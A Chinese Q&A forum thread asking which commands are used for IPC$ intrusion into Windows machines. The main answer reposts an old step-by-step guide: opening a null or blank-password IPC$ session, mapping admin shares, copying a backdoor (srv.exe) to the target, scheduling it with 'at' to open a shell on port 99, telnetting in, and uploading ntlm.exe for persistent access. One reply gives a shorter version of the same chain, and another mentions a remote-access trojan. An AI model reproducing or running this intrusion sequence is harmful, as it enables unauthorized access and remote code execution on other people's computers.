我要发布
仪器网/ 仪器社区/ IPC/ IPC连接入侵需要的命令都有哪些?

IPC连接入侵需要的命令都有哪些?

715241630    2013-11-04    IPC    浏览 277 次

精彩问答
哈哈哈哈去草 发布日期:2013-11-05
IPC$入侵命令 作者:Lo7e4L 提交日期:2004-10-13 05:35 一:入侵过程1)建立空连接: net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 2)建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推) 如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$ 4)删除一个ipc$连接 net use \\IP\ipc$ /del 5)删除共享映射 net use c: /del 删除映射的c盘,其他盘类推 net use * /del 删除全部,会有提示要求按y确认 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用流光扫到的用户名是administrators,密码为"空"的IP地址,如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以diyi个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。    2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。    3. C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。    4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)    5. C:\>net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。    6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了    7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在流光的Tools目录中)。 ……。见 http://hi.baidu.com/xyz17888/blog/item/52c10138cdf73d24b9998ff6.html
全部评论
123就啊731 发布日期:2013-11-05
这些都是机器的口令!大家其实不用口令也能解决!!比如用鸽子!吧口令生成个文件!这样用起来还是比较方便的!
靳薪善 发布日期:2013-11-05
net view

net use \\192.168.1.x\ipc$ "" /user:Administrator

copy c:\1.exe \\192.168.1.x\C$

net time \\192.168.1.x

at \\192.168.1.1 12:12 c:\1.exe
最新主题
相关版块
我要评论
X您尚未登录
账号登录
X您尚未登录
手机动态密码登录
X您尚未登录
扫码登录
官方微信

仪器网微信服务号

扫码获取最新信息


仪器网官方订阅号

扫码获取最新信息

在线客服

咨询客服

在线客服
工作日:  9:00-18:00
联系客服 企业专属客服
电话客服:  400-822-6768
工作日:  9:00-18:00
订阅商机

仪采招微信公众号

采购信息一键获取海量商机轻松掌控